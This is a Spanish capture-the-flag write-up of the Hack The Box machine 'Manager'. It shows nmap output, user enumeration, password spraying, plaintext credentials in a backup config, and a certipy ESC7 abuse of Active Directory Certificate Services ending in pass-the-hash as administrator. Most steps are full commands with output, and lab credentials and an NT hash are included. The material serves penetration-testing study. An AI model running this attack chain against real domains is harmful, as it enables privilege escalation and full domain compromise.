En Manager realizamos una enumeracion de usuarios por SIDs, nos permitio acceder por MSSQL y a su vez realizar una enumeracion con xp_dirtree donde descubrimos un backup del sitio, dentro, encontramos credenciales que nos dieron acceso por WinRM. Finalmente escalamos privilegios tras explotar una vulnerabilidad en ADCS.
# Nmap 7.94 scan initiated Thu Nov 9 17:06:30 2023 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49687,49688,49689,49726,55087 -Pn -sV -sC -oN nmap_scan 10.10.11.236Nmap scan report for 10.10.11.236
Host is up (0.073s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-10 05:06:37Z)135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019| Service pack level: RTM
| Post-SP patches applied: false|_ TCP port: 1433| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-11-10T04:52:27
|_Not valid after: 2053-11-10T04:52:27
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m00s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
55087/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-10T05:09:01
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 9 17:09:40 2023 -- 1 IP address (1 host up) scanned in 189.78 seconds
Web Site
Los headers del sitio muestran un Microsoft IIS 10.
π ~/htb/manager ❯ rpcclient -U "" -N 10.10.11.236
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
Enum Users
Intentamos realizar una enumeracion de usuarios por medio de SIDs en este caso utilizamos el usuario ‘guest’ sin contrasena, observamos que muestra multiples usuarios y con ello creamos un wordlist.
Utilizamos los usuarios como contrasenas con crackmapexec por smb, encontramos que el usuario Operator puede autenticarse y listar los recursos compartidos por samba.
π ~/htb/manager/website ❯ ls -lah
total 68K
drwxr-xr-x 5 kali kali 4.0K Nov 9 19:28 .
drwxr-xr-x 3 kali kali 4.0K Nov 9 19:28 ..
-rw-r--r-- 1 kali kali 5.3K Jul 27 05:32 about.html
-rw-r--r-- 1 kali kali 5.2K Jul 27 05:32 contact.html
drwxr-xr-x 2 kali kali 4.0K Nov 9 19:28 css
drwxr-xr-x 2 kali kali 4.0K Nov 9 19:28 images
-rw-r--r-- 1 kali kali 18K Jul 27 05:32 index.html
drwxr-xr-x 2 kali kali 4.0K Nov 9 19:28 js
-rw-r--r-- 1 kali kali 698 Jul 27 05:35 .old-conf.xml
-rw-r--r-- 1 kali kali 7.8K Jul 27 05:32 service.html
π ~/htb/manager/website ❯ cat .old-conf.xml
<?xml version="1.0"encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
π ~/htb/manager/website ❯
Verificamos por WinRM, encontramos que las credenciales son funcionales.
*Evil-WinRM* PS C:\Users\Raven\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID===========================================================manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116
GROUP INFORMATION
-----------------
Group Name Type SID Attributes=========================================================================================================================Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State==================================================================SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Raven\Desktop>
Certipy
Ejecutamos certipy verificando si exise alguna vulnerabilidad en alguna plantilla, se muestra una vulnerable a ESC7 donde raven tiene permisos.
π ~/htb/manager ❯ certipy-ad find -vulnerable -u raven@manager.htb -p "R4v3nBe5tD3veloP3r\!123" -dc-ip 10.10.11.236 -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for'manager-DC01-CA' via CSRA
[*] Got CA configuration for'manager-DC01-CA'[*] Enumeration output:
Certificate Authorities
0 CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
π ~/htb/manager ❯
ESC7
Para explotar esta vulnerabilidad necesitamos tener la plantilla SubCA habilitada, lo hacemos agregando primero a raven como nuevo “officer” al Certificate Authority, una vez hecho se habilita la plantilla SubCA siendo Raven Officer.
π ~/htb/manager ❯ certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123"Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Successfully added officer 'Raven' on 'manager-DC01-CA' π ~/htb/manager ❯ certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123"Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Successfully enabled 'SubCA' on 'manager-DC01-CA' π ~/htb/manager ❯
Uilizando la plantilla SubCA solicitamos un certificado, el error es esperado unicamente tomamos el ID que luego nos sirve para emitir un certificado basado en el ID.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
π ~/htb/manager ❯ certipy-ad req -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123" -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 16Would you like to save the private key? (y/N) y
[*] Saved private key to 16.key
[-] Failed to request certificate
π ~/htb/manager ❯ certipy-ad ca -ca 'manager-DC01-CA' -issue-request 16 -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123"Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Successfully issued certificate
π ~/htb/manager ❯
Podemos obtener el certificado con el ID anterior.
1
2
3
4
5
6
7
8
9
10
π ~/htb/manager ❯ certipy-ad req -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123" -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 16 -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Rerieving certificate with ID 16[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'[*] Certificate has no object SID
[*] Loaded private key from '16.key'[*] Saved certificate and private key to 'administrator.pfx' π ~/htb/manager ❯
Sincronizamos nuestra hora con la de la maquina para finalmente autenticarnos como administrator, para finalmente mostrarnos el NTLM hash de este usuario.
1
2
3
4
5
6
7
8
9
10
11
12
13
π ~/htb/manager ❯ sudo ntpdate 10.10.11.236
2023-11-10 02:52:30.507066 (-0500) +25200.289340 +/- 0.033445 10.10.11.236 s1 no-leap
CLOCK: time stepped by 25200.289340
π ~/htb/manager ❯ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'[*] Trying to retrieve NT hashfor'administrator'[*] Got hashfor'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
π ~/htb/manager ❯
Shell
Utilizando este hash por WinRM logramos acceder y leer la flag root.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
π ~/htb/manager ❯ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc()function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
manager\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
8e9ae1d9eb2a9bfdeb3d33d064e7ec25
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Podemos ejecutar secretsdump de impacket para obtener los hashes.